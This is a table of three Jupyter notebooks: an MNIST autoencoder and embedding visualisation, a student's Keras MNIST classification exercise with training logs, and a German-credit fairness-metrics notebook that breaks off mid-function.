path (stringlengths 7-265) | concatenated_notebook (stringlengths 46-17M) |
---|---|
assets/posts/latent-spaces/vanilla-autoencoder.ipynb | ###Markdown
Create JS data structures
###Code
import json
with open('data/trainX-sample.json', 'w') as out:
json.dump(trainX[:50].tolist(), out)
with open('data/trainY.json', 'w') as out:
json.dump(trainY.tolist(), out)
import matplotlib.pyplot as plt
import numpy as np
import math
px_per_cell_side = 28
cells_per_axis = math.floor(2048/px_per_cell_side)
cells_per_atlas = cells_per_axis**2
n_atlases = math.ceil(trainX.shape[0] / cells_per_atlas)
# create a series of columns and suture them together
for i in range(n_atlases-1): # -1 to just create full atlas files (skip the remainder)
start = i * cells_per_atlas
end = (i+1) * cells_per_atlas
x = trainX[start:end]
cols = []
for j in range(cells_per_axis):
col_start = j*cells_per_axis
col_end = (j+1)*cells_per_axis
col = x[col_start:col_end].reshape(px_per_cell_side*cells_per_axis, px_per_cell_side)
cols.append(col)
im = np.hstack(cols)
im = 255-im # use 255- to flip black and white
plt.imsave('images/atlas-images/atlas-' + str(i) + '.jpg', im, cmap='gray')
# get a single row of images to render to ui
row = 255-x[col_start:col_end]
if False: plt.imsave('images/sample-row.jpg', np.hstack(row), cmap='gray')
print(' * total cells:', n_atlases * cells_per_atlas)
consumed = set()
for i in range(10):
for jdx, j in enumerate(trainY):
if j == i:
im = 255 - trainX[jdx].squeeze()
plt.imsave('images/digits/digit-' + str(i) + '.png', im, cmap='gray')
break
# create low dimensional embeddings
# from MulticoreTSNE import MulticoreTSNE as TSNE
from sklearn.manifold import TSNE, MDS, SpectralEmbedding, Isomap, LocallyLinearEmbedding
from umap import UMAP
from copy import deepcopy
import rasterfairy
import json
def center(arr):
'''Center an array to clip space -0.5:0.5 on all axes'''
arr = deepcopy(arr)
for i in range(arr.shape[1]):
arr[:,i] = arr[:,i] - np.min(arr[:,i])
arr[:,i] = arr[:,i] / np.max(arr[:,i])
arr[:,i] -= 0.5
return arr
def curate(arr):
'''Prepare an array for persistence to json'''
return np.around(center(arr), 4).tolist()
# prepare model inputs
n = 10000 #trainX.shape[0]
sampleX = trainX[:n]
flat = sampleX.reshape(sampleX.shape[0], sampleX.shape[1] * sampleX.shape[2])
# create sklearn outputs
for clf, label in [
#[SpectralEmbedding, 'se'],
#[Isomap, 'iso'],
#[LocallyLinearEmbedding, 'lle'],
#[MDS, 'mds'],
[TSNE, 'tsne'],
[UMAP, 'umap'],
]:
print(' * processing', label)
positions = clf(n_components=2).fit_transform(flat)
with open('data/mnist-positions/' + label + '_positions.json', 'w') as out:
json.dump(curate(positions), out)
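# rasterfairy (imported above) can snap a 2D embedding onto a regular grid for
# gap-free image layouts; a sketch of the typical call (assumed API -- check the docs):
# grid_xy, (grid_w, grid_h) = rasterfairy.transformPointCloud2D(positions)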
import keras.backend as K
import numpy as np
import os, json
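# NOTE: the `Autoencoder` class used below is defined earlier in the full notebook
# (not shown in this excerpt). A minimal sketch consistent with how it is used here,
# exposing `.auto` (the compiled end-to-end model), `.encoder` and `.decoder`
# (hypothetical implementation -- the hidden-layer size and loss are assumptions):
from tensorflow import keras
class Autoencoder:
    def __init__(self, latent_dim=2):
        inputs = keras.Input(shape=(28, 28))  # MNIST-shaped images
        h = keras.layers.Dense(128, activation='relu')(keras.layers.Flatten()(inputs))
        z = keras.layers.Dense(latent_dim)(h)  # low-dimensional latent code
        self.encoder = keras.Model(inputs, z)
        latent = keras.Input(shape=(latent_dim,))
        out = keras.layers.Dense(28 * 28, activation='sigmoid')(latent)
        self.decoder = keras.Model(latent, keras.layers.Reshape((28, 28))(out))
        self.auto = keras.Model(inputs, self.decoder(self.encoder(inputs)))
        self.auto.compile(optimizer=keras.optimizers.Adam(), loss='mse')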
# create autoencoder outputs
model = Autoencoder(latent_dim=2)
lr = 0.005
for i in range(10):
lr *= 0.9
print(' * running step:', i, '-- lr:', lr)
K.set_value(model.auto.optimizer.lr, lr)
model.auto.fit(trainX, trainX, batch_size=250, epochs=10)
# save the auto latent positions to disk
auto_positions = model.encoder.predict(sampleX)
with open('data/mnist-positions/auto_positions.json', 'w') as out:
json.dump(curate(auto_positions), out)
# save the decoder to disk
model.decoder.save('data/model/decoder.h5')
os.system('tensorflowjs_converter --input_format keras \
data/model/decoder.h5 \
data/model/decoder')
# save the decoder domain (min/max of each latent axis) to disk
z = model.encoder.predict(sampleX)  # latent projections; computed here so `domains` below is well defined
domains = [[ float(np.min(z[:,i])), float(np.max(z[:,i])) ] for i in range(z.shape[1])]
with open('data/model/decoder-domains.json', 'w') as out:
json.dump(domains, out)
%matplotlib inline
import matplotlib.pyplot as plt
# plot the latent space
z = model.encoder.predict(trainX[:n]) # project inputs into latent space
colors = trainY[:n].tolist() # color points with labels
plt.scatter(z[:,0], z[:,1], marker='o', s=1, c=colors)
plt.colorbar()
import math
px_per_cell_side = 28
cells_per_axis = math.floor(2048/px_per_cell_side)
cells_per_atlas = cells_per_axis**2
n_atlases = math.ceil(trainX.shape[0] / cells_per_atlas)
print(' * total cells:', n_atlases * cells_per_atlas)
# create a series of columns and suture them together
for i in range(n_atlases-1): # -1 to just create full atlas files (skip the remainder)
start = i * cells_per_atlas
end = (i+1) * cells_per_atlas
x = trainX[start:end]
cols = []
for j in range(cells_per_axis):
col_start = j*cells_per_axis
col_end = (j+1)*cells_per_axis
col = x[col_start:col_end].reshape(px_per_cell_side*cells_per_axis, px_per_cell_side)
cols.append(col)
im = np.hstack(cols)
plt.imsave('atlas-' + str(i) + '.jpg', im, cmap='gray')
b = np.hstack(cols)
plt.imshow(b)
###Output
_____no_output_____ |
neural network_Image classification_Jass.ipynb | ###Markdown
MMAI 894 - Exercise 1: Feedforward artificial neural network for image classification

The goal of this exercise is to show you how to create your first neural network using the tensorflow/keras library. We will be using the MNIST dataset.

Submission instructions:
- You cannot edit this notebook directly. Save a copy to your drive, and make sure to identify yourself in the title using name and student number
- Do not insert new cells before the final one (titled "Further exploration")
- Select File -> Download as .py (important! not as ipynb)
- Rename the file: `studentID_lastname_firstname_ex1.py`
- Notebook must be able to _restart and run all_
- The mark will be assessed on the implementation of the functions with TODO
- **Do not change anything outside the functions** unless in the further exploration section
- The mark is not based on final accuracy - only on correctness
- Do not use any additional libraries than the ones listed below (you may import additional modules from those libraries if needed)

References
- https://keras.io/getting-started/sequential-model-guide/
- https://keras.io/api/utils/python_utils/to_categorical-function
- https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html
- https://keras.io/api/layers/core_layers/dense/
- https://keras.io/api/layers/regularization_layers/dropout/
- https://keras.io/api/models/model_training_apis/

Libraries
###Code
# Import modules
# Add modules as needed
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
# For windows laptops add following 2 lines:
# import matplotlib
# matplotlib.use('agg')
import matplotlib.pyplot as plt
import tensorflow.keras as keras
from keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout
###Output
_____no_output_____
###Markdown
Data preparation

Import data
###Code
def load_data():
# Import MNIST dataset from openml
dataset = fetch_openml('mnist_784', version=1, data_home=None)
# Data preparation
raw_X = dataset['data']
raw_Y = dataset['target']
return raw_X, raw_Y
raw_X, raw_Y = load_data()
###Output
_____no_output_____
###Markdown
Consider the following
- what shape is X?
- what value ranges does X take?
  - might this present a problem?
  - what transformations need to be applied?
- what shape is Y?
- what value ranges does Y take?
  - what transformations should be applied?
###Code
print('Q: what shape is X?')
print('Shape of X:', raw_X.shape)
print('\n')
print('Q: what value ranges does X take?')
print('Range of X is from %s to %s' % (raw_X.min(), raw_X.max()))
print('\n')
print(' Q: might this present a problem?')
print(' we need to transform the data to the 0 to 1 range.')
print('\n')
print(' Q: what transformations need to be applied?')
print(' divide it by 255')
print('\n')
print('Q: what shape is Y?')
print('Shape of Y:', raw_Y.shape)
print('\n')
print('Q: what value ranges does Y take?')
print('Range of Y is from %s to %s' % (raw_Y.min(), raw_Y.max()))
print('\n')
print(' Q: what transformations should be applied?')
print(' Convert it to categorical data')
def clean_data(raw_X, raw_Y):
# TODO: clean and QA raw_X and raw_Y
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
print('Shape of X:', raw_X.shape)
print('Range of X is from %s to %s' % (raw_X.min(), raw_X.max()))
print('X values:', raw_X)
cleaned_X = raw_X.astype('float32') / 255
print('\nShape of Y:', raw_Y.shape)
print('Range of Y is from %s to %s' % (raw_Y.min(), raw_Y.max()))
print('Y labels:', raw_Y)
# Categorically encode labels
cleaned_Y = to_categorical(raw_Y, 10)
return cleaned_X, cleaned_Y
cleaned_X, cleaned_Y = clean_data(raw_X, raw_Y)
print('\n')
print('Clean Data:')
print('-----------')
clean_data(cleaned_X, cleaned_Y)
###Output
Shape of X: (70000, 784)
Range of X is from 0.0 to 255.0
X values: [[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
Shape of Y: (70000,)
Range of Y is from 0 to 9
Y labels: ['5' '0' '4' ... '4' '5' '6']
Clean Data:
-----------
Shape of X: (70000, 784)
Range of X is from 0.0 to 1.0
X values: [[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
Shape of Y: (70000, 10)
Range of Y is from 0.0 to 1.0
Y labels: [[0. 0. 0. ... 0. 0. 0.]
[1. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
###Markdown
Data split
- Split your data into a train set (50%), a validation set (20%) and a test set (30%). You can use scikit-learn's train_test_split function.
###Code
def split_data(cleaned_X, cleaned_Y):
# TODO: split the data
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
train_ratio = 0.50
validation_ratio = 0.20
test_ratio = 0.30
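# note: train_test_split returns (train, test); with test_size=0.5 the first returned
# half (assigned to X_test here) becomes the pool split into val/test below, while the
# second half (X_train) is the 50% training set -- the printed shapes confirm 50/20/30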
X_test, X_train, Y_test, Y_train = train_test_split(cleaned_X, cleaned_Y, test_size = 1-train_ratio, random_state=42)
X_val, X_test, Y_val, Y_test = train_test_split(X_test, Y_test, train_size = validation_ratio/(test_ratio + validation_ratio), random_state = 42)
return X_val, X_test, X_train, Y_val, Y_test, Y_train
X_val, X_test, X_train, Y_val, Y_test, Y_train = split_data(cleaned_X, cleaned_Y)
print('X_train:',X_train.shape)
print('X_val:',X_val.shape)
print('X_test:',X_test.shape)
###Output
X_train: (35000, 784)
X_val: (14000, 784)
X_test: (21000, 784)
###Markdown
[Optional]: plot your data with matplotlib
- Hint: you will need to reshape the row's data into a 28x28 matrix
- https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.imshow.html
- https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
###Code
def viz_data(X_train):
X_train_sample = X_train[:10, ]
# TODO: (optional) plot your data with matplotlib
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
for i in range(10):
img = X_train_sample[i].reshape((28,28))
plt.subplot(2,5,i+1)
plt.imshow(img, cmap="Greys")
#plt.show()
viz_data(X_train)
###Output
_____no_output_____
###Markdown
Model

Neural network structure
- For this network, we'll use 2 hidden layers
- Layer 1 should have 128 nodes, a dropout rate of 20%, and relu as its activation function
- Layer 2 should have 64 nodes, a dropout rate of 20%, and relu as its activation function
- The last layer should map back to the 10 possible MNIST classes. Use softmax as the activation
###Code
def build_model():
# TODO: build the model,
# HINT: you should have Total params: 109,386
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model = Sequential()
#Adding the input layer and the first hidden layer
model.add(keras.layers.Flatten(input_shape=[28*28]))
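# the input rows are already flat vectors of length 784, so this Flatten is a
# pass-through that mainly serves to declare the input shape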
model.add(Dense(units=128, activation='relu'))
#dropout rate of 20%
model.add(Dropout(.2))
#Layer 2
model.add(Dense(units=64, activation='relu'))
model.add(Dropout(.20))
# Adding the output layer
model.add(Dense(units=10, activation='softmax', ))
return model
model = build_model()
model.summary()
###Output
Model: "sequential"
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
flatten (Flatten) (None, 784) 0
_________________________________________________________________
dense (Dense) (None, 128) 100480
_________________________________________________________________
dropout (Dropout) (None, 128) 0
_________________________________________________________________
dense_1 (Dense) (None, 64) 8256
_________________________________________________________________
dropout_1 (Dropout) (None, 64) 0
_________________________________________________________________
dense_2 (Dense) (None, 10) 650
=================================================================
Total params: 109,386
Trainable params: 109,386
Non-trainable params: 0
_________________________________________________________________
###Markdown
Model compilation
- what loss function should you use?
- Note your choice of optimizer
- Include accuracy as a metric

Model training
- Use a batch size of 128, and train for 12 epochs
- Use verbose training, include validation data
###Code
def compile_model(model):
# TODO: compile the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model.compile(optimizer = "adam", loss = 'categorical_crossentropy', metrics = ['accuracy'])
return model
def train_model(model, X_train, Y_train, X_val, Y_val):
# TODO: train the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
history = model.fit(X_train, Y_train, validation_data=(X_val, Y_val), batch_size= 128, epochs = 12, verbose=1)
return model, history
model = compile_model(model)
model, history = train_model(model, X_train, Y_train, X_val, Y_val)
###Output
Epoch 1/12
274/274 [==============================] - 2s 5ms/step - loss: 0.9531 - accuracy: 0.7049 - val_loss: 0.2358 - val_accuracy: 0.9279
Epoch 2/12
274/274 [==============================] - 1s 4ms/step - loss: 0.2774 - accuracy: 0.9187 - val_loss: 0.1623 - val_accuracy: 0.9506
Epoch 3/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1997 - accuracy: 0.9403 - val_loss: 0.1402 - val_accuracy: 0.9577
Epoch 4/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1676 - accuracy: 0.9504 - val_loss: 0.1211 - val_accuracy: 0.9635
Epoch 5/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1448 - accuracy: 0.9563 - val_loss: 0.1107 - val_accuracy: 0.9661
Epoch 6/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1188 - accuracy: 0.9641 - val_loss: 0.1032 - val_accuracy: 0.9693
Epoch 7/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0997 - accuracy: 0.9692 - val_loss: 0.0973 - val_accuracy: 0.9694
Epoch 8/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0900 - accuracy: 0.9733 - val_loss: 0.0922 - val_accuracy: 0.9713
Epoch 9/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0841 - accuracy: 0.9750 - val_loss: 0.0924 - val_accuracy: 0.9724
Epoch 10/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0743 - accuracy: 0.9768 - val_loss: 0.0919 - val_accuracy: 0.9721
Epoch 11/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0682 - accuracy: 0.9792 - val_loss: 0.0908 - val_accuracy: 0.9728
Epoch 12/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0682 - accuracy: 0.9769 - val_loss: 0.0920 - val_accuracy: 0.9753
###Markdown
Model evaluation
- Show the performance on the test set
- What is the difference between "evaluate" and "predict"?
- Identify a few images the model classifies incorrectly. Any observations?
###Code
def eval_model(model, X_test, Y_test):
# TODO: evaluate the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
score = model.evaluate(X_test, Y_test, verbose=0)
test_loss = score[0]
test_accuracy = score[1]
print('Model performance on the test set:')
print('Test cross-entropy loss: %0.5f' % score[0])
print('Test accuracy: %0.2f' % score[1])
return test_loss, test_accuracy
test_loss, test_accuracy = eval_model(model, X_test, Y_test)
print('\nevaluate() evaluates the trained model on the test set: it computes the loss on the inputs passed, plus other evaluation metrics such as accuracy,')
print('whereas predict() generates the output predictions of the model.')
predictions = model.predict([X_test])
print('\nPredictions are output probability distributions:')
print('First prediction:\n', predictions[0])
print('\n')
import numpy as np
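# note: Sequential.predict_classes() used below was removed in newer Keras versions;
# np.argmax(model.predict(X_test), axis=-1) is the equivalent there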
predicted_classes = model.predict_classes(X_test)
correct_indices = np.nonzero(predicted_classes == Y_test.argmax(axis=-1))[0]
incorrect_indices = np.nonzero(predicted_classes != Y_test.argmax(axis=-1))[0]
print('\nA few incorrectly classified images:')
plt.figure(2, figsize=(7,7))
for i, incorrect in enumerate(incorrect_indices[:9]):
plt.subplot(3,3,i+1)
plt.imshow(X_test[incorrect].reshape(28,28), cmap='gray', interpolation='none')
plt.title("Predicted {}, Class {}".format(predicted_classes[incorrect], Y_test[incorrect].argmax(axis=-1)))
plt.xticks([])
plt.yticks([])
###Output
Model performance on the test set:
Test cross-entropy loss: 0.09535
Test accuracy: 0.97
evaluate() evaluates the trained model on the test set: it computes the loss on the inputs passed, plus other evaluation metrics such as accuracy,
whereas predict() generates the output predictions of the model.
Predictions are output probability distributions:
First prediction:
[2.3445311e-07 6.4776609e-06 1.9541719e-06 3.4884238e-07 8.4975655e-12
9.9996185e-01 2.4509511e-05 2.1627974e-11 4.5998631e-06 6.6054263e-08]
###Markdown
Further exploration (Not evaluated)

Looking for something else to do?
- Transform your code to do hyperparameter search.
- You can vary the number of nodes in the layers, the dropout rate, the optimizer and the parameters in Adam, the batch size, etc.
###Code
#Correct predicted
plt.figure(1, figsize=(7,7))
for i, correct in enumerate(correct_indices[:9]):
plt.subplot(3,3,i+1)
plt.imshow(X_test[correct].reshape(28,28), cmap='gray', interpolation='none')
plt.title("Predicted {}, Class {}".format(predicted_classes[correct], Y_test[correct].argmax(axis=-1)))
plt.xticks([])
plt.yticks([])
###Output
_____no_output_____
###Markdown
Plot loss trajectory throughout training.
###Code
# Plot loss trajectory throughout training.
plt.figure(1, figsize=(14,5))
plt.subplot(1,2,1)
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='valid')
plt.xlabel('Epoch')
plt.ylabel('Cross-Entropy Loss')
plt.legend()
plt.subplot(1,2,2)
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='valid')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend()
###Output
_____no_output_____
###Markdown
Increasing the number of layers
###Code
def build_model1():
# TODO: build the model,
# HINT: you should have Total params: 109,386
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model_1 = Sequential()
IMGSIZE = 784
#Adding the input layer and the first hidden layer
model_1.add(Dense(units=128, activation='relu', input_shape=(IMGSIZE, )))
#dropout rate of 10%
model_1.add(Dropout(.1))
#Layer 2
model_1.add(Dense(units=64, activation='relu', input_shape=(IMGSIZE, )))
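# note: Keras only uses input_shape on the first layer; on the later layers it is accepted but ignored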
model_1.add(Dropout(.10))
#Layer 3
model_1.add(Dense(units=34, activation='relu', input_shape=(IMGSIZE, )))
#Layer 4
model_1.add(Dense(units=34, activation='relu', input_shape=(IMGSIZE, )))
# Adding the output layer
model_1.add(Dense(units=10, activation='softmax', input_shape=(IMGSIZE, )))
return model_1
model_1 = build_model1()
model_1.summary()
def compile_model1(model_1):
# TODO: compile the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model_1.compile(optimizer = "sgd", loss = 'categorical_crossentropy', metrics = ['accuracy'])
return model_1
def train_model1(model_1, X_train, Y_train, X_val, Y_val):
# TODO: train the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
history_1 = model_1.fit(X_train, Y_train, validation_data=(X_val, Y_val), batch_size= 128, epochs = 12, verbose=1)
return model_1, history_1
model_1 = compile_model1(model_1)
model_1, history_1 = train_model1(model_1, X_train, Y_train, X_val, Y_val)
###Output
Epoch 1/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0587 - accuracy: 0.9819 - val_loss: 0.0878 - val_accuracy: 0.9756
Epoch 2/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0555 - accuracy: 0.9817 - val_loss: 0.0862 - val_accuracy: 0.9759
Epoch 3/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0522 - accuracy: 0.9831 - val_loss: 0.0930 - val_accuracy: 0.9751
Epoch 4/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0519 - accuracy: 0.9825 - val_loss: 0.0883 - val_accuracy: 0.9753
Epoch 5/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0456 - accuracy: 0.9849 - val_loss: 0.0890 - val_accuracy: 0.9756
Epoch 6/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0455 - accuracy: 0.9854 - val_loss: 0.0893 - val_accuracy: 0.9754
Epoch 7/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0423 - accuracy: 0.9858 - val_loss: 0.0898 - val_accuracy: 0.9765
Epoch 8/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0385 - accuracy: 0.9874 - val_loss: 0.0878 - val_accuracy: 0.9756
Epoch 9/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0366 - accuracy: 0.9877 - val_loss: 0.0938 - val_accuracy: 0.9760
Epoch 10/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0369 - accuracy: 0.9879 - val_loss: 0.0920 - val_accuracy: 0.9776
Epoch 11/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0361 - accuracy: 0.9875 - val_loss: 0.0972 - val_accuracy: 0.9756
Epoch 12/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0344 - accuracy: 0.9888 - val_loss: 0.0984 - val_accuracy: 0.9751
###Markdown
###Code
## Perform Hyperparameter Optimization
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
from keras.layers import Dense, Activation, Embedding, Flatten, LeakyReLU, BatchNormalization, Dropout
from keras.activations import relu, sigmoid, softmax
def create_model(layers, activation):
model = Sequential()
for i, nodes in enumerate(layers):
if i == 0:
model.add(Dense(nodes, input_dim = X_train.shape[1]))
model.add(Activation(activation))
model.add(Dropout(0.3))
else:
model.add(Dense(nodes))
model.add(Activation(activation))
model.add(Dropout(0.3))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
return model
model = KerasClassifier(build_fn=create_model, verbose=0)
layers = [[120], [80,60], [45,30,15]]
activations = ['sigmoid', 'relu']
param_grid = dict(layers=layers, activation=activations, batch_size=[128, 256], epochs=[30])
grid = GridSearchCV(estimator = model, param_grid=param_grid, cv=5)
#grid = GridSearchCV(estimator=model, param_grid=param_grid,cv=5)
grid_result = grid.fit(X_train, Y_train)
print(grid_result.best_score_,grid_result.best_params_)
###Output
_____no_output_____ |
notebooks/_old/fairness_metrics.ipynb | ###Markdown
Fairness Metrics

This notebook implements the statistical fairness metrics from:
*Towards the Right Kind of Fairness in AI* by Boris Ruf and Marcin Detyniecki (2021)
https://arxiv.org/abs/2102.08453

Example with the `german-risk-scoring.csv` dataset.

Contributors: Xavier Lioneton & Francis Wolinski

Imports
###Code
# imports
import numpy as np
import pandas as pd
from pandas.api.types import is_numeric_dtype
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from IPython.display import display, Markdown
###Output
_____no_output_____
###Markdown
Data Load
###Code
# dataset
data = pd.read_csv('german-risk-scoring.csv')
data.info()
# target
data['Cost Matrix(Risk)'].value_counts()
# Personal status and sex
data["Personal status and sex"].value_counts()
###Output
_____no_output_____
###Markdown
Data Prep
###Code
# create sex column
data["sex"] = data["Personal status and sex"].apply(lambda x : x.split(":")[0])
# create X=features, y=target
X = data.drop(columns = 'Cost Matrix(Risk)')
y = data['Cost Matrix(Risk)'].map({"Good Risk": 1, "Bad Risk": 0})
# type modifications
cols_cat = [
'Status of existing checking account',
'Credit history',
'Purpose',
'Savings account/bonds',
'Present employment since',
'Personal status and sex',
'Other debtors / guarantors',
'Property',
'Other installment plans',
'Housing',
'Job',
'Telephone',
'foreign worker',
'sex'
]
cols_num = [
'Duration in month',
'Credit amount',
'Installment rate in percentage of disposable income',
'Present residence since',
'Age in years',
'Number of existing credits at this bank',
'Number of people being liable to provide maintenance for',
]
for col in cols_cat:
data[col] = data[col].astype(str)
for col in cols_num:
data[col] = data[col].astype(float)
cols = cols_cat + cols_num
# unique values of categorical columns
X[cols_cat].nunique()
# all to numbers
encoder = OneHotEncoder()
X_cat = encoder.fit_transform(X[cols_cat]).toarray()
X_num = X[cols_num]
X_prep = np.concatenate((X_num, X_cat), axis=1)
X_prep.shape
# data prepared
cols = data[cols_num].columns.tolist() + encoder.get_feature_names(input_features=X[cols_cat].columns).tolist()
data_prep = pd.DataFrame(X_prep, columns=cols)
data_prep.shape
# data prepared
data_prep.head()
###Output
_____no_output_____
###Markdown
Machine Learning
###Code
# split train test
X_train, X_test, y_train, y_test = train_test_split(data_prep, y, test_size=0.2, random_state=42)
X_train = X_train.copy()
X_test = X_test.copy()
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
###Output
(800, 63) (200, 63) (800,) (200,)
###Markdown
Train Model
###Code
# train model
clf = LogisticRegression(random_state=0, n_jobs=8, max_iter=500)
clf.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Confusion matrix
###Code
# Schema of confusion matrix
df = pd.DataFrame([['True negatives (TN)', 'False positives (FP)'], ['False negatives (FN)', 'True positives (TP)']], index=['Y = 0', 'Y = 1'], columns=['Ŷ = 0', 'Ŷ = 1'])
df = df.reindex(['Y = 1', 'Y = 0'])
df = df[['Ŷ = 1', 'Ŷ = 0']]
display(Markdown('**Schema of confusion matrix**'))
display(df)
# function pretty_confusion_mattrix()
def pretty_confusion_mattrix(y_label, y_pred, title=None):
"""Pretty print the confusion matrix computed by scikit-learn"""
_TN, _FP, _FN, _TP = confusion_matrix(y_label, y_pred).flatten()
array = [[_TP, _FN], [_FP, _TN]]
df = pd.DataFrame(array, index=['Y = 1', 'Y = 0'], columns=['Ŷ = 1', 'Ŷ = 0'])
if title is not None:
display(Markdown(title))
display(df)
# test dataset
y_pred = clf.predict(X_test)
pretty_confusion_mattrix(y_test, y_pred, title='**Confusion matrix for the test dataset**')
# function pretty_confusion_mattrix_by_subgroup()
def pretty_confusion_mattrix_by_subgroup(X, col, X_test, y_label, y_pred, q=4):
"""Pretty print the confusion matrices by subgroup
X: dataset
col: column used for splitting into subgroups
X_test: test dataset
y_label: target for test dataset
y_pred: predictions for test dataset
q: number of quantile bins used for a numerical column"""
# if col is numeric, use quantile
cat = pd.qcut(X[col], q) if is_numeric_dtype(X[col]) else X[col]
# select test data
cat = cat.loc[X_test.index]
# switch y_pred to Series so as to be able to select by subgroup
y_pred = pd.Series(y_pred, index=y_label.index)
# loop on subgroups
for value in sorted(cat.unique()):
X_select = X_test.loc[cat == value]
pretty_confusion_mattrix(y_label.loc[X_select.index],
y_pred.loc[X_select.index],
title=f'**Subgroup**: {col} = {value}')
pretty_confusion_mattrix_by_subgroup(X, 'sex', X_test, y_test, y_pred)
pretty_confusion_mattrix_by_subgroup(X, 'Age in years', X_test, y_test, y_pred)
###Output
_____no_output_____
###Markdown
Metrics derived from confusion matrix

**Actual positives**
This number is the sum of the true positives and the false negatives, which can be viewed as missed true positives.
$P = TP + FN$

**Actual negatives**
This number is the sum of the true negatives and the false positives, which again can be viewed as missed true negatives.
$N = TN + FP$

**Base rate**
This number, sometimes also called the prevalence rate, represents the proportion of actual positives with respect to the entire data set.
$BR = \frac{P}{P + N}$

**Positive rate**
This number is the overall rate of positively classified instances, including both correct and incorrect decisions.
$PR = \frac{TP + FP}{P + N}$

**Negative rate**
This number is the ratio of negative classifications, again irrespective of whether the decisions were correct or incorrect.
$NR = \frac{TN + FN}{P + N}$

**Accuracy**
This number is the ratio of the correctly classified instances (positive and negative) of all decisions.
$ACC = \frac{TP + TN}{P + N}$

**Misclassification rate**
This number is the ratio of the misclassified instances over all decisions.
$MR = \frac{FN + FP}{P + N}$

**True positive rate (recall)**
This number describes the proportion of correctly classified positive instances.
$TPR = \frac{TP}{P}$

**True negative rate**
This number describes the proportion of correctly classified negative instances.
$TNR = \frac{TN}{N}$

**False positive rate**
This number denotes the proportion of actual negatives which was falsely classified as positive.
$FPR = \frac{FP}{N}$

**False negative rate (silence)**
This number describes the proportion of actual positives which was misclassified as negative.
$FNR = \frac{FN}{P}$

**False discovery rate (noise)**
This number describes the share of misclassified positive classifications of all positive predictions.
$FDR = \frac{FP}{TP + FP}$

**Positive predicted value (precision)**
This number describes the ratio of samples which were correctly classified as positive from all the positive predictions.
$PPV = \frac{TP}{TP + FP}$

**False omission rate**
This number describes the proportion of false negative predictions of all negative predictions.
$FOR = \frac{FN}{TN + FN}$

**Negative predicted value**
This number describes the ratio of samples which were correctly classified as negative from all the negative predictions.
$NPV = \frac{TN}{TN + FN}$
###Code
# function pretty_confusion_mattrix()
def pretty_fairness_confusion_mattrix(y_label, y_pred, title=None):
"""Pretty print fairness confusion matrix
y_label: target for test dataset
y_pred: predictions for test dataset
title: string to display in Markdown"""
# compute fairness metrics
_TN, _FP, _FN, _TP = confusion_matrix(y_label, y_pred).flatten()
_P = _TP + _FN
_N = _FP + _TN
_BR = _P / (_P + _N)
_PR = (_TP + _FP) / (_P + _N)
_NR = (_TN + _FN) / (_P + _N)
_TPR = _TP / _P
_TNR = _TN / _N
_FDR = _FP / (_TP + _FP)
_FOR = _FN / (_TN + _FN)
# build the output dataframe
